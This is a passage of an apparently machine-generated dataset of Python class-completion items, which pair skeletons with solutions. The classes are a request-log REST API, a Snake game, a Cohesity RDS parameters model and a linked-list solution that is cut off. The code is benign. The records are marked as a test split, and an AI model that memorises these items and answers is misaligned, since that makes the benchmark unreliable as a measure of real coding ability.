type: string description: 请求id - in: query name: page type: int description: 页码 - name: status type: int in: query description: 状态码 responses: 200: description: A single logs item schema: id: RequestLog properties: username: type: string description: The name of the user default: Steven Wilson\n- def delete(self, id=None): 根据请求日志id删除信息 --- tags: - logs parameters: - in: path name: id type: integer format: int64 required: true responses: 200: description: 根据请求日志id删除信息 schema: id: RequestLog properties: username: type: string description: The name of the request_logs default: Steven Wilson", "prompted_full_text": "Implement the Python class `LogRequest` described below.\n\nClass description:\nImplement the LogRequest class.\n\nMethod signatures and docstrings:\n- def get(self): 获取请求日志信息 --- tags: - logs summary: Add a new pet to the store parameters: - in: query name: request_id type: string description: 请求id - in: query name: page type: int description: 页码 - name: status type: int in: query description: 状态码 responses: 200: description: A single logs item schema: id: RequestLog properties: username: type: string description: The name of the user default: Steven Wilson\n- def delete(self, id=None): 根据请求日志id删除信息 --- tags: - logs parameters: - in: path name: id type: integer format: int64 required: true responses: 200: description: 根据请求日志id删除信息 schema: id: RequestLog properties: username: type: string description: The name of the request_logs default: Steven Wilson\n\n<|skeleton|>\nclass LogRequest:\n\n def get(self):\n \"\"\"获取请求日志信息 --- tags: - logs summary: Add a new pet to the store parameters: - in: query name: request_id type: string description: 请求id - in: query name: page type: int description: 页码 - name: status type: int in: query description: 状态码 responses: 200: description: A single logs item schema: id: RequestLog properties: username: type: string description: The name of the user default: Steven Wilson\"\"\"\n <|body_0|>\n\n def delete(self, id=None):\n \"\"\"根据请求日志id删除信息 --- tags: - logs parameters: - in: path name: id type: integer format: int64 required: true responses: 200: description: 根据请求日志id删除信息 schema: id: RequestLog properties: username: type: string description: The name of the request_logs default: Steven Wilson\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n args = parser.parse_args()\n request_id = args.get('request_id')\n status_num = args.get('status_num')\n page = args.get('pgnum')\n if not page:\n page = 1\n options = {'page': page, 'request_id': request_id, 'status_num': status_num}\n if log_list_c(options=options):\n request_logs, pg = log_list_c(options=options)\n response_data['code'] = 1200\n response_data['ok'] = True\n response_data['data'] = request_logs\n response_data['msg'] = '获取日志信息成功'\n response_data['pg'] = pg\n return response_data\n else:\n response_data['code'] = 1204\n response_data['msg'] = '搜索日志结果不存在'\n response_data['ok'] = False\n response_data['data'] = ''\n response_data['pg'] = ''\n return response_data\n<|end_body_0|>\n\n<|body_start_1|>\n response_data['data'] = ''\n response_data['pg'] = ''\n if id:\n result = log_delete_c(id=id)\n if result:\n response_data['msg'] = '删除成功'\n response_data['ok'] = True\n response_data['code'] = 1200\n else:\n response_data['msg'] = '不存在的请求日志ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n else:\n response_data['msg'] = '请输入ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n<|end_body_1|>\n", "revision_id": "73246bbd492fd991e0329b9a011b5380b11a1618", "skeleton": "<|skeleton|>\nclass LogRequest:\n\n def get(self):\n \"\"\"获取请求日志信息 --- tags: - logs summary: Add a new pet to the store parameters: - in: query name: request_id type: string description: 请求id - in: query name: page type: int description: 页码 - name: status type: int in: query description: 状态码 responses: 200: description: A single logs item schema: id: RequestLog properties: username: type: string description: The name of the user default: Steven Wilson\"\"\"\n <|body_0|>\n\n def delete(self, id=None):\n \"\"\"根据请求日志id删除信息 --- tags: - logs parameters: - in: path name: id type: integer format: int64 required: true responses: 200: description: 根据请求日志id删除信息 schema: id: RequestLog properties: username: type: string description: The name of the request_logs default: Steven Wilson\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LogRequest:\n def get(self):\n \"\"\"获取请求日志信息 --- tags: - logs summary: Add a new pet to the store parameters: - in: query name: request_id type: string description: 请求id - in: query name: page type: int description: 页码 - name: status type: int in: query description: 状态码 responses: 200: description: A single logs item schema: id: RequestLog properties: username: type: string description: The name of the user default: Steven Wilson\"\"\"\n args = parser.parse_args()\n request_id = args.get('request_id')\n status_num = args.get('status_num')\n page = args.get('pgnum')\n if not page:\n page = 1\n options = {'page': page, 'request_id': request_id, 'status_num': status_num}\n if log_list_c(options=options):\n request_logs, pg = log_list_c(options=options)\n response_data['code'] = 1200\n response_data['ok'] = True\n response_data['data'] = request_logs\n response_data['msg'] = '获取日志信息成功'\n response_data['pg'] = pg\n return response_data\n else:\n response_data['code'] = 1204\n response_data['msg'] = '搜索日志结果不存在'\n response_data['ok'] = False\n response_data['data'] = ''\n response_data['pg'] = ''\n return response_data\n\n def delete(self, id=None):\n \"\"\"根据请求日志id删除信息 --- tags: - logs parameters: - in: path name: id type: integer format: int64 required: true responses: 200: description: 根据请求日志id删除信息 schema: id: RequestLog properties: username: type: string description: The name of the request_logs default: Steven Wilson\"\"\"\n response_data['data'] = ''\n response_data['pg'] = ''\n if id:\n result = log_delete_c(id=id)\n if result:\n response_data['msg'] = '删除成功'\n response_data['ok'] = True\n response_data['code'] = 1200\n else:\n response_data['msg'] = '不存在的请求日志ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n else:\n response_data['msg'] = '请输入ID'\n response_data['code'] = 3005\n response_data['ok'] = False\n return response_data\n", "source": "the_stack_v2_python_sparse", "source_path": "app/main/base/apis/request_logs.py", "source_repo": "zhouliang0v0/naguan-kpy", "split": "test", "star_events_count": 0} {"blob_id": "fa3d86b057c416802ed490a7c7bf1603492b99f4", "bodies": ["self.n = height\nself.m = width\nself.dirs = {'L': [0, -1], 'U': [-1, 0], 'R': [0, 1], 'D': [1, 0]}\nself.food = collections.deque(food)\nself.snake_set = {(0, 0)}\nself.snake = collections.deque([(0, 0)])", "x, y = (self.snake[-1][0] + self.dirs[direction][0], self.snake[-1][1] + self.dirs[direction][1])\nif x >= self.n or y >= self.m or x < 0 or (y < 0):\n return -1\ntail = self.snake.popleft()\nself.snake_set.discard(tail)\nif (x, y) in self.snake_set:\n return -1\nif len(self.food) > 0 and (x, y) == (self.food[0][0], self.food[0][1]):\n self.food.popleft()\n self.snake.appendleft(tail)\n self.snake_set.add(tail)\nself.snake.append((x, y))\nself.snake_set.add((x, y))\nreturn len(self.snake) - 1"], "bodies_text": "<|body_start_0|>\n self.n = height\n self.m = width\n self.dirs = {'L': [0, -1], 'U': [-1, 0], 'R': [0, 1], 'D': [1, 0]}\n self.food = collections.deque(food)\n self.snake_set = {(0, 0)}\n self.snake = collections.deque([(0, 0)])\n<|end_body_0|>\n\n<|body_start_1|>\n x, y = (self.snake[-1][0] + self.dirs[direction][0], self.snake[-1][1] + self.dirs[direction][1])\n if x >= self.n or y >= self.m or x < 0 or (y < 0):\n return -1\n tail = self.snake.popleft()\n self.snake_set.discard(tail)\n if (x, y) in self.snake_set:\n return -1\n if len(self.food) > 0 and (x, y) == (self.food[0][0], self.food[0][1]):\n self.food.popleft()\n self.snake.appendleft(tail)\n self.snake_set.add(tail)\n self.snake.append((x, y))\n self.snake_set.add((x, y))\n return len(self.snake) - 1\n<|end_body_1|>\n", "class_docstring": "", "class_name": "SnakeGame", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SnakeGame:\n\n def __init__(self, width: int, height: int, food: List[List[int]]):\n \"\"\"Initialize your data structure here. @param width - screen width @param height - screen height @param food - A list of food positions E.g food = [[1,1], [1,0]] means the first food is positioned at [1,1], the second is at [1,0].\"\"\"\n <|body_0|>\n\n def move(self, direction: str) -> int:\n \"\"\"Moves the snake. @param direction - 'U' = Up, 'L' = Left, 'R' = Right, 'D' = Down @return The game's score after the move. Return -1 if game over. Game over when snake crosses the screen boundary or bites its body.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.n = height\n self.m = width\n self.dirs = {'L': [0, -1], 'U': [-1, 0], 'R': [0, 1], 'D': [1, 0]}\n self.food = collections.deque(food)\n self.snake_set = {(0, 0)}\n self.snake = collections.deque([(0, 0)])\n<|end_body_0|>\n\n<|body_start_1|>\n x, y = (self.snake[-1][0] + self.dirs[direction][0], self.snake[-1][1] + self.dirs[direction][1])\n if x >= self.n or y >= self.m or x < 0 or (y < 0):\n return -1\n tail = self.snake.popleft()\n self.snake_set.discard(tail)\n if (x, y) in self.snake_set:\n return -1\n if len(self.food) > 0 and (x, y) == (self.food[0][0], self.food[0][1]):\n self.food.popleft()\n self.snake.appendleft(tail)\n self.snake_set.add(tail)\n self.snake.append((x, y))\n self.snake_set.add((x, y))\n return len(self.snake) - 1\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000123", "length_bytes": 1784, "license_type": "no_license", "methods": [{"docstring": "Initialize your data structure here. @param width - screen width @param height - screen height @param food - A list of food positions E.g food = [[1,1], [1,0]] means the first food is positioned at [1,1], the second is at [1,0].", "name": "__init__", "signature": "def __init__(self, width: int, height: int, food: List[List[int]])"}, {"docstring": "Moves the snake. @param direction - 'U' = Up, 'L' = Left, 'R' = Right, 'D' = Down @return The game's score after the move. Return -1 if game over. Game over when snake crosses the screen boundary or bites its body.", "name": "move", "signature": "def move(self, direction: str) -> int"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006012", "prompt": "Implement the Python class `SnakeGame` described below.\n\nClass description:\nImplement the SnakeGame class.\n\nMethod signatures and docstrings:\n- def __init__(self, width: int, height: int, food: List[List[int]]): Initialize your data structure here. @param width - screen width @param height - screen height @param food - A list of food positions E.g food = [[1,1], [1,0]] means the first food is positioned at [1,1], the second is at [1,0].\n- def move(self, direction: str) -> int: Moves the snake. @param direction - 'U' = Up, 'L' = Left, 'R' = Right, 'D' = Down @return The game's score after the move. Return -1 if game over. Game over when snake crosses the screen boundary or bites its body.", "prompted_full_text": "Implement the Python class `SnakeGame` described below.\n\nClass description:\nImplement the SnakeGame class.\n\nMethod signatures and docstrings:\n- def __init__(self, width: int, height: int, food: List[List[int]]): Initialize your data structure here. @param width - screen width @param height - screen height @param food - A list of food positions E.g food = [[1,1], [1,0]] means the first food is positioned at [1,1], the second is at [1,0].\n- def move(self, direction: str) -> int: Moves the snake. @param direction - 'U' = Up, 'L' = Left, 'R' = Right, 'D' = Down @return The game's score after the move. Return -1 if game over. Game over when snake crosses the screen boundary or bites its body.\n\n<|skeleton|>\nclass SnakeGame:\n\n def __init__(self, width: int, height: int, food: List[List[int]]):\n \"\"\"Initialize your data structure here. @param width - screen width @param height - screen height @param food - A list of food positions E.g food = [[1,1], [1,0]] means the first food is positioned at [1,1], the second is at [1,0].\"\"\"\n <|body_0|>\n\n def move(self, direction: str) -> int:\n \"\"\"Moves the snake. @param direction - 'U' = Up, 'L' = Left, 'R' = Right, 'D' = Down @return The game's score after the move. Return -1 if game over. Game over when snake crosses the screen boundary or bites its body.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.n = height\n self.m = width\n self.dirs = {'L': [0, -1], 'U': [-1, 0], 'R': [0, 1], 'D': [1, 0]}\n self.food = collections.deque(food)\n self.snake_set = {(0, 0)}\n self.snake = collections.deque([(0, 0)])\n<|end_body_0|>\n\n<|body_start_1|>\n x, y = (self.snake[-1][0] + self.dirs[direction][0], self.snake[-1][1] + self.dirs[direction][1])\n if x >= self.n or y >= self.m or x < 0 or (y < 0):\n return -1\n tail = self.snake.popleft()\n self.snake_set.discard(tail)\n if (x, y) in self.snake_set:\n return -1\n if len(self.food) > 0 and (x, y) == (self.food[0][0], self.food[0][1]):\n self.food.popleft()\n self.snake.appendleft(tail)\n self.snake_set.add(tail)\n self.snake.append((x, y))\n self.snake_set.add((x, y))\n return len(self.snake) - 1\n<|end_body_1|>\n", "revision_id": "59f70dc4466e15df591ba285317e4a1fe808ed60", "skeleton": "<|skeleton|>\nclass SnakeGame:\n\n def __init__(self, width: int, height: int, food: List[List[int]]):\n \"\"\"Initialize your data structure here. @param width - screen width @param height - screen height @param food - A list of food positions E.g food = [[1,1], [1,0]] means the first food is positioned at [1,1], the second is at [1,0].\"\"\"\n <|body_0|>\n\n def move(self, direction: str) -> int:\n \"\"\"Moves the snake. @param direction - 'U' = Up, 'L' = Left, 'R' = Right, 'D' = Down @return The game's score after the move. Return -1 if game over. Game over when snake crosses the screen boundary or bites its body.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SnakeGame:\n def __init__(self, width: int, height: int, food: List[List[int]]):\n \"\"\"Initialize your data structure here. @param width - screen width @param height - screen height @param food - A list of food positions E.g food = [[1,1], [1,0]] means the first food is positioned at [1,1], the second is at [1,0].\"\"\"\n self.n = height\n self.m = width\n self.dirs = {'L': [0, -1], 'U': [-1, 0], 'R': [0, 1], 'D': [1, 0]}\n self.food = collections.deque(food)\n self.snake_set = {(0, 0)}\n self.snake = collections.deque([(0, 0)])\n\n def move(self, direction: str) -> int:\n \"\"\"Moves the snake. @param direction - 'U' = Up, 'L' = Left, 'R' = Right, 'D' = Down @return The game's score after the move. Return -1 if game over. Game over when snake crosses the screen boundary or bites its body.\"\"\"\n x, y = (self.snake[-1][0] + self.dirs[direction][0], self.snake[-1][1] + self.dirs[direction][1])\n if x >= self.n or y >= self.m or x < 0 or (y < 0):\n return -1\n tail = self.snake.popleft()\n self.snake_set.discard(tail)\n if (x, y) in self.snake_set:\n return -1\n if len(self.food) > 0 and (x, y) == (self.food[0][0], self.food[0][1]):\n self.food.popleft()\n self.snake.appendleft(tail)\n self.snake_set.add(tail)\n self.snake.append((x, y))\n self.snake_set.add((x, y))\n return len(self.snake) - 1\n", "source": "the_stack_v2_python_sparse", "source_path": "leet/Design/353_Design_Snake_Game.py", "source_repo": "arsamigullin/problem_solving_python", "split": "test", "star_events_count": 0} {"blob_id": "c6b61b1ccc655e553605ee2fb68683d9add0b6f2", "bodies": ["self.availability_zone_id = availability_zone_id\nself.db_instance_id = db_instance_id\nself.db_option_group_id = db_option_group_id\nself.db_parameter_group_id = db_parameter_group_id\nself.db_port = db_port\nself.enable_auto_minor_version_upgrade = enable_auto_minor_version_upgrade\nself.enable_copy_tags_to_snapshots = enable_copy_tags_to_snapshots\nself.enable_db_authentication = enable_db_authentication\nself.enable_public_accessibility = enable_public_accessibility\nself.is_multi_az_deployment = is_multi_az_deployment", "if dictionary is None:\n return None\navailability_zone_id = dictionary.get('availabilityZoneId')\ndb_instance_id = dictionary.get('dbInstanceId')\ndb_option_group_id = dictionary.get('dbOptionGroupId')\ndb_parameter_group_id = dictionary.get('dbParameterGroupId')\ndb_port = dictionary.get('dbPort')\nenable_auto_minor_version_upgrade = dictionary.get('enableAutoMinorVersionUpgrade')\nenable_copy_tags_to_snapshots = dictionary.get('enableCopyTagsToSnapshots')\nenable_db_authentication = dictionary.get('enableDbAuthentication')\nenable_public_accessibility = dictionary.get('enablePublicAccessibility')\nis_multi_az_deployment = dictionary.get('isMultiAzDeployment')\nreturn cls(availability_zone_id, db_instance_id, db_option_group_id, db_parameter_group_id, db_port, enable_auto_minor_version_upgrade, enable_copy_tags_to_snapshots, enable_db_authentication, enable_public_accessibility, is_multi_az_deployment)"], "bodies_text": "<|body_start_0|>\n self.availability_zone_id = availability_zone_id\n self.db_instance_id = db_instance_id\n self.db_option_group_id = db_option_group_id\n self.db_parameter_group_id = db_parameter_group_id\n self.db_port = db_port\n self.enable_auto_minor_version_upgrade = enable_auto_minor_version_upgrade\n self.enable_copy_tags_to_snapshots = enable_copy_tags_to_snapshots\n self.enable_db_authentication = enable_db_authentication\n self.enable_public_accessibility = enable_public_accessibility\n self.is_multi_az_deployment = is_multi_az_deployment\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n availability_zone_id = dictionary.get('availabilityZoneId')\n db_instance_id = dictionary.get('dbInstanceId')\n db_option_group_id = dictionary.get('dbOptionGroupId')\n db_parameter_group_id = dictionary.get('dbParameterGroupId')\n db_port = dictionary.get('dbPort')\n enable_auto_minor_version_upgrade = dictionary.get('enableAutoMinorVersionUpgrade')\n enable_copy_tags_to_snapshots = dictionary.get('enableCopyTagsToSnapshots')\n enable_db_authentication = dictionary.get('enableDbAuthentication')\n enable_public_accessibility = dictionary.get('enablePublicAccessibility')\n is_multi_az_deployment = dictionary.get('isMultiAzDeployment')\n return cls(availability_zone_id, db_instance_id, db_option_group_id, db_parameter_group_id, db_port, enable_auto_minor_version_upgrade, enable_copy_tags_to_snapshots, enable_db_authentication, enable_public_accessibility, is_multi_az_deployment)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'RdsParams' model. Specifies rds params for the restore operation. Attributes: availability_zone_id (long|int): Entity representing the availability zone to use while restoring the DB. db_instance_id (string, required): The DB instance identifier to use for the restored DB. This field is required. db_option_group_id (long|int): Entity representing the RDS option group to use while restoring the DB. db_parameter_group_id (long|int): Entity representing the RDS parameter group to use while restoring the DB. db_port (int): Port to use for the DB in the restored RDS instance. enable_auto_minor_version_upgrade (bool): Whether to enable auto minor version upgrade in the resto", "class_name": "RdsParams", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RdsParams:\n \"\"\"Implementation of the 'RdsParams' model. Specifies rds params for the restore operation. Attributes: availability_zone_id (long|int): Entity representing the availability zone to use while restoring the DB. db_instance_id (string, required): The DB instance identifier to use for the restored DB. This field is required. db_option_group_id (long|int): Entity representing the RDS option group to use while restoring the DB. db_parameter_group_id (long|int): Entity representing the RDS parameter group to use while restoring the DB. db_port (int): Port to use for the DB in the restored RDS instance. enable_auto_minor_version_upgrade (bool): Whether to enable auto minor version upgrade in the resto\"\"\"\n\n def __init__(self, availability_zone_id=None, db_instance_id=None, db_option_group_id=None, db_parameter_group_id=None, db_port=None, enable_auto_minor_version_upgrade=None, enable_copy_tags_to_snapshots=None, enable_db_authentication=None, enable_public_accessibility=None, is_multi_az_deployment=None):\n \"\"\"Constructor for the RdsParams class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.availability_zone_id = availability_zone_id\n self.db_instance_id = db_instance_id\n self.db_option_group_id = db_option_group_id\n self.db_parameter_group_id = db_parameter_group_id\n self.db_port = db_port\n self.enable_auto_minor_version_upgrade = enable_auto_minor_version_upgrade\n self.enable_copy_tags_to_snapshots = enable_copy_tags_to_snapshots\n self.enable_db_authentication = enable_db_authentication\n self.enable_public_accessibility = enable_public_accessibility\n self.is_multi_az_deployment = is_multi_az_deployment\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n availability_zone_id = dictionary.get('availabilityZoneId')\n db_instance_id = dictionary.get('dbInstanceId')\n db_option_group_id = dictionary.get('dbOptionGroupId')\n db_parameter_group_id = dictionary.get('dbParameterGroupId')\n db_port = dictionary.get('dbPort')\n enable_auto_minor_version_upgrade = dictionary.get('enableAutoMinorVersionUpgrade')\n enable_copy_tags_to_snapshots = dictionary.get('enableCopyTagsToSnapshots')\n enable_db_authentication = dictionary.get('enableDbAuthentication')\n enable_public_accessibility = dictionary.get('enablePublicAccessibility')\n is_multi_az_deployment = dictionary.get('isMultiAzDeployment')\n return cls(availability_zone_id, db_instance_id, db_option_group_id, db_parameter_group_id, db_port, enable_auto_minor_version_upgrade, enable_copy_tags_to_snapshots, enable_db_authentication, enable_public_accessibility, is_multi_az_deployment)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000124", "length_bytes": 4883, "license_type": "permissive", "methods": [{"docstring": "Constructor for the RdsParams class", "name": "__init__", "signature": "def __init__(self, availability_zone_id=None, db_instance_id=None, db_option_group_id=None, db_parameter_group_id=None, db_port=None, enable_auto_minor_version_upgrade=None, enable_copy_tags_to_snapshots=None, enable_db_authentication=None, enable_public_accessibility=None, is_multi_az_deployment=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `RdsParams` described below.\n\nClass description:\nImplementation of the 'RdsParams' model. Specifies rds params for the restore operation. Attributes: availability_zone_id (long|int): Entity representing the availability zone to use while restoring the DB. db_instance_id (string, required): The DB instance identifier to use for the restored DB. This field is required. db_option_group_id (long|int): Entity representing the RDS option group to use while restoring the DB. db_parameter_group_id (long|int): Entity representing the RDS parameter group to use while restoring the DB. db_port (int): Port to use for the DB in the restored RDS instance. enable_auto_minor_version_upgrade (bool): Whether to enable auto minor version upgrade in the resto\n\nMethod signatures and docstrings:\n- def __init__(self, availability_zone_id=None, db_instance_id=None, db_option_group_id=None, db_parameter_group_id=None, db_port=None, enable_auto_minor_version_upgrade=None, enable_copy_tags_to_snapshots=None, enable_db_authentication=None, enable_public_accessibility=None, is_multi_az_deployment=None): Constructor for the RdsParams class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `RdsParams` described below.\n\nClass description:\nImplementation of the 'RdsParams' model. Specifies rds params for the restore operation. Attributes: availability_zone_id (long|int): Entity representing the availability zone to use while restoring the DB. db_instance_id (string, required): The DB instance identifier to use for the restored DB. This field is required. db_option_group_id (long|int): Entity representing the RDS option group to use while restoring the DB. db_parameter_group_id (long|int): Entity representing the RDS parameter group to use while restoring the DB. db_port (int): Port to use for the DB in the restored RDS instance. enable_auto_minor_version_upgrade (bool): Whether to enable auto minor version upgrade in the resto\n\nMethod signatures and docstrings:\n- def __init__(self, availability_zone_id=None, db_instance_id=None, db_option_group_id=None, db_parameter_group_id=None, db_port=None, enable_auto_minor_version_upgrade=None, enable_copy_tags_to_snapshots=None, enable_db_authentication=None, enable_public_accessibility=None, is_multi_az_deployment=None): Constructor for the RdsParams class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass RdsParams:\n \"\"\"Implementation of the 'RdsParams' model. Specifies rds params for the restore operation. Attributes: availability_zone_id (long|int): Entity representing the availability zone to use while restoring the DB. db_instance_id (string, required): The DB instance identifier to use for the restored DB. This field is required. db_option_group_id (long|int): Entity representing the RDS option group to use while restoring the DB. db_parameter_group_id (long|int): Entity representing the RDS parameter group to use while restoring the DB. db_port (int): Port to use for the DB in the restored RDS instance. enable_auto_minor_version_upgrade (bool): Whether to enable auto minor version upgrade in the resto\"\"\"\n\n def __init__(self, availability_zone_id=None, db_instance_id=None, db_option_group_id=None, db_parameter_group_id=None, db_port=None, enable_auto_minor_version_upgrade=None, enable_copy_tags_to_snapshots=None, enable_db_authentication=None, enable_public_accessibility=None, is_multi_az_deployment=None):\n \"\"\"Constructor for the RdsParams class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.availability_zone_id = availability_zone_id\n self.db_instance_id = db_instance_id\n self.db_option_group_id = db_option_group_id\n self.db_parameter_group_id = db_parameter_group_id\n self.db_port = db_port\n self.enable_auto_minor_version_upgrade = enable_auto_minor_version_upgrade\n self.enable_copy_tags_to_snapshots = enable_copy_tags_to_snapshots\n self.enable_db_authentication = enable_db_authentication\n self.enable_public_accessibility = enable_public_accessibility\n self.is_multi_az_deployment = is_multi_az_deployment\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n availability_zone_id = dictionary.get('availabilityZoneId')\n db_instance_id = dictionary.get('dbInstanceId')\n db_option_group_id = dictionary.get('dbOptionGroupId')\n db_parameter_group_id = dictionary.get('dbParameterGroupId')\n db_port = dictionary.get('dbPort')\n enable_auto_minor_version_upgrade = dictionary.get('enableAutoMinorVersionUpgrade')\n enable_copy_tags_to_snapshots = dictionary.get('enableCopyTagsToSnapshots')\n enable_db_authentication = dictionary.get('enableDbAuthentication')\n enable_public_accessibility = dictionary.get('enablePublicAccessibility')\n is_multi_az_deployment = dictionary.get('isMultiAzDeployment')\n return cls(availability_zone_id, db_instance_id, db_option_group_id, db_parameter_group_id, db_port, enable_auto_minor_version_upgrade, enable_copy_tags_to_snapshots, enable_db_authentication, enable_public_accessibility, is_multi_az_deployment)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass RdsParams:\n \"\"\"Implementation of the 'RdsParams' model. Specifies rds params for the restore operation. Attributes: availability_zone_id (long|int): Entity representing the availability zone to use while restoring the DB. db_instance_id (string, required): The DB instance identifier to use for the restored DB. This field is required. db_option_group_id (long|int): Entity representing the RDS option group to use while restoring the DB. db_parameter_group_id (long|int): Entity representing the RDS parameter group to use while restoring the DB. db_port (int): Port to use for the DB in the restored RDS instance. enable_auto_minor_version_upgrade (bool): Whether to enable auto minor version upgrade in the resto\"\"\"\n\n def __init__(self, availability_zone_id=None, db_instance_id=None, db_option_group_id=None, db_parameter_group_id=None, db_port=None, enable_auto_minor_version_upgrade=None, enable_copy_tags_to_snapshots=None, enable_db_authentication=None, enable_public_accessibility=None, is_multi_az_deployment=None):\n \"\"\"Constructor for the RdsParams class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RdsParams:\n \"\"\"Implementation of the 'RdsParams' model. Specifies rds params for the restore operation. Attributes: availability_zone_id (long|int): Entity representing the availability zone to use while restoring the DB. db_instance_id (string, required): The DB instance identifier to use for the restored DB. This field is required. db_option_group_id (long|int): Entity representing the RDS option group to use while restoring the DB. db_parameter_group_id (long|int): Entity representing the RDS parameter group to use while restoring the DB. db_port (int): Port to use for the DB in the restored RDS instance. enable_auto_minor_version_upgrade (bool): Whether to enable auto minor version upgrade in the resto\"\"\"\n\n def __init__(self, availability_zone_id=None, db_instance_id=None, db_option_group_id=None, db_parameter_group_id=None, db_port=None, enable_auto_minor_version_upgrade=None, enable_copy_tags_to_snapshots=None, enable_db_authentication=None, enable_public_accessibility=None, is_multi_az_deployment=None):\n \"\"\"Constructor for the RdsParams class\"\"\"\n self.availability_zone_id = availability_zone_id\n self.db_instance_id = db_instance_id\n self.db_option_group_id = db_option_group_id\n self.db_parameter_group_id = db_parameter_group_id\n self.db_port = db_port\n self.enable_auto_minor_version_upgrade = enable_auto_minor_version_upgrade\n self.enable_copy_tags_to_snapshots = enable_copy_tags_to_snapshots\n self.enable_db_authentication = enable_db_authentication\n self.enable_public_accessibility = enable_public_accessibility\n self.is_multi_az_deployment = is_multi_az_deployment\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n availability_zone_id = dictionary.get('availabilityZoneId')\n db_instance_id = dictionary.get('dbInstanceId')\n db_option_group_id = dictionary.get('dbOptionGroupId')\n db_parameter_group_id = dictionary.get('dbParameterGroupId')\n db_port = dictionary.get('dbPort')\n enable_auto_minor_version_upgrade = dictionary.get('enableAutoMinorVersionUpgrade')\n enable_copy_tags_to_snapshots = dictionary.get('enableCopyTagsToSnapshots')\n enable_db_authentication = dictionary.get('enableDbAuthentication')\n enable_public_accessibility = dictionary.get('enablePublicAccessibility')\n is_multi_az_deployment = dictionary.get('isMultiAzDeployment')\n return cls(availability_zone_id, db_instance_id, db_option_group_id, db_parameter_group_id, db_port, enable_auto_minor_version_upgrade, enable_copy_tags_to_snapshots, enable_db_authentication, enable_public_accessibility, is_multi_az_deployment)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/rds_params.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "12db096aedf15b066c5ec0ae75a80ee760694486", "bodies": ["dummy = ListNode(0)\ndummy.next = head\ncurr = head\nposition = 0\nwhile curr:\n position += 1\n curr = curr.next\nposition -= n\ncurr = dummy\nwhile position > 0:\n position -= 1\n curr = curr.next\ncurr.next = curr.next.next\nreturn dummy.next", "dummy = ListNode(0)\ndummy.next = head\nfirst = dummy\nsecond = dummy\nfor i in range(n + 1):\n first = first.next\nwhile first:\n first = first.next\n second = second.next\nsecond.next = second.next.next\nreturn dummy.next"], "bodies_text": "<|body_start_0|>\n dummy = ListNode(0)\n dummy.next = head\n curr = head\n position = 0\n while curr:\n position += 1\n curr = curr.next\n position -= n\n curr = dummy\n while position > 0:\n position -= 1\n curr = curr.next\n curr.next = curr.next.next\n return dummy.next\n<|end_body_0|>\n\n<|body_start_1|>\n dummy = ListNode(0)\n dummy.next = head\n first = dummy\n second = dummy\n for i in range(n + 1):\n first = first.next\n while first:\n first = first.next\n second = second.next\n second.next = second.next.next\n return 